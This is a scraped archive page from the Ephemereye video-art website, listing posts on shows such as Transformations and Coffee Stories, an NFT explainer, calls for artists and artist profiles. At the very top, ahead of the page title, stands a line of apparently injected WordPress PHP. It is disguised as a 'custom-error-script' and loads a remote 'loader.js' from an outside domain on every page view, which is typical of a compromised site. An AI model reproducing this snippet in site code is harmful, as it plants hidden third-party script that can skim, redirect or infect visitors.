// analytical function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Artist Archives - Ephemereye : Ephemereye

EphemerEye is happy to announce Transformations, a video art show

EphemerEye is happy to announce Transformations, a video art show. To be aired on Marin TV December 30th at 12am PST, January 2nd at 1 am PST, January 6th at 2 am PST.  It will be also available on Youtube for a limited time until 30 January 2023. Participating artists: 

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Demystifying NFTs, and why is it a mystery on the first place?

The concept of NFT as a relatively new phenomenon despite its inception in 2014, when Kevin McCoy first ‘minted’ his #NFT Quantum in collaboration with a programer Anil Dash in 2014. The concept behind it was to protect digital art reproduced on the web without credit or attribution. It came

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Coffee Stories Virtual Show

Unfortunately, our long anticipated live exhibition Coffee Stories can’t happen because of the current situation with pandemic.  So, we have to keep it virtual in a hope that next year will bring a relief, and our physical reality will return and take new roots. We are also working on a

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Coffee Stories – Live Show: Call for Artists

Whether you have something in your portfolio you want to submit, or you feel inspired and want to create something new. Time limit is 5 minutes. Unlimited free submission. REGISTER on Ephemereye.art and send links to your work on vimeo or youtube, artist statement, and your CV/Resume to ephemereye@gmail.com Announced

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Introducing: Sinasi Gunes

Turkish artist Şinasi Güneş in conversation with Ephemereye. “As a concept, it is human who adds meaning to art. In this case, art is something that exists together with human being and is something that [will disappear with] the death of human being. Today, in the world imposed by global

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It’s still happening. Carla Forte. 

No matter how much we want this pandemic to be over, it’s still happening and it still affects our lives. Artists still reflect on it, still create work, and we are still showing it. Today, we bring you the work of Carla Forte, and a few thought that she shared

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Veronica Shimanovskaya for Plague & Locusts 2020, and Ephemereye.

Prompted by Emma Roper-Evans to answer her interview questions for The Sunday Tribune Online, I thought it was appropriate to use those answers to accompany my entry to the Plague and Locusts 2020. I started my life in St Petersburg, then moved to the San Francisco Bay area, then to

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Plague and Locusts: Sean Christopher Dwyer

As video art is situated on the cusp of art and technology, it is not always easy to separate it from film making or performance. The fluid boundaries include an innumerable variety of short form moving image work from abstract visuals to fictional narratives with everything in-between. Responding to Ephemereye’s artist

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Plague and Locusts: Ella Frost

“Ella’s work is informed by the urge to tell the truth and warp the truth simultaneously. Landscapes, intimate moments with friends and family members, their body and the constant questioning of identity count for the majority of their work. Their art practice centres around sexuality, sexual health and marginality, an

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Plague and Locust 2020: Jonathan Kelham

Jonathan’s work predominantly explores the construction of a romanticised, melancholic and self-deprecating notion of Englishness presented in the reoccurring qualities of subjective utopian philosophies. The work presents a collection of hybrid characters [Joe Orton Paddington Bear. Alan Moore Count Duckula. Brian Clough The Brain. Kate Bush Eeyore…] who explore this

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